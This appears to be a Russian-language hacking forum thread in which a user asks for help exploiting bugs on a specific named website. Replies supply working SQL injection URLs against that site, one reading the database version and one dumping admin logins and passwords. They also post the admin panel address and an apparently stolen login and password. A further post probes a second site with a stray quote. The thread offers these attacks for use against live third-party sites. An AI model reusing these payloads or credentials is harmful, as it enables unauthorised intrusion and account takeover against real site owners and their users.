|
sql inj хелп ми
Есть один сайтег.С виду кул, но мною там было обнаружено баги.В том и дело что только обнаружено. :(
Вот ход моих действий.: !)Иду по сцылге: http://mysms.ipsys.net/ 2)Вижу там "Пошук" и сразу сую джаваскрипт: PHP код:
Цитата:
3) Смотрю дальше.. И вижу строчку: Цитата:
PHP код:
Цитата:
4) Покопавшись исчо увидил Цитата:
PHP код:
Прошу хелпа у знающих... Пасиб за внимание |
http://mysms.ipsys.net/index.php?smstype=0xaaaa+union+select+1,2,version( ),4,5/*
|
А как бы ето заюзать?
|
Код:
http://mysms.ipsys.net/index.php?smstype=-7+union+select+1,concat(login,0x3a,pass)+from+admin+limit+0,1http://mysms.ipsys.net/admin/index.php login:Baltazor pass:stones |
http://www.fuck.ru/products.aspx?id='
Значит ли че нить!!!!Иля я просто напрасно это делаю??? Server Error in '/' Application. -------------------------------------------------------------------------------- Runtime Error Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine. Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off". <!-- Web.Config Configuration File --> <configuration> <system.web> <customErrors mode="Off"/> </system.web> </configuration> Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL. |
К сожалению…напрасно) :)
|
Используйте специально прикрепленную тему для вопросов.
|
| Время: 04:57 |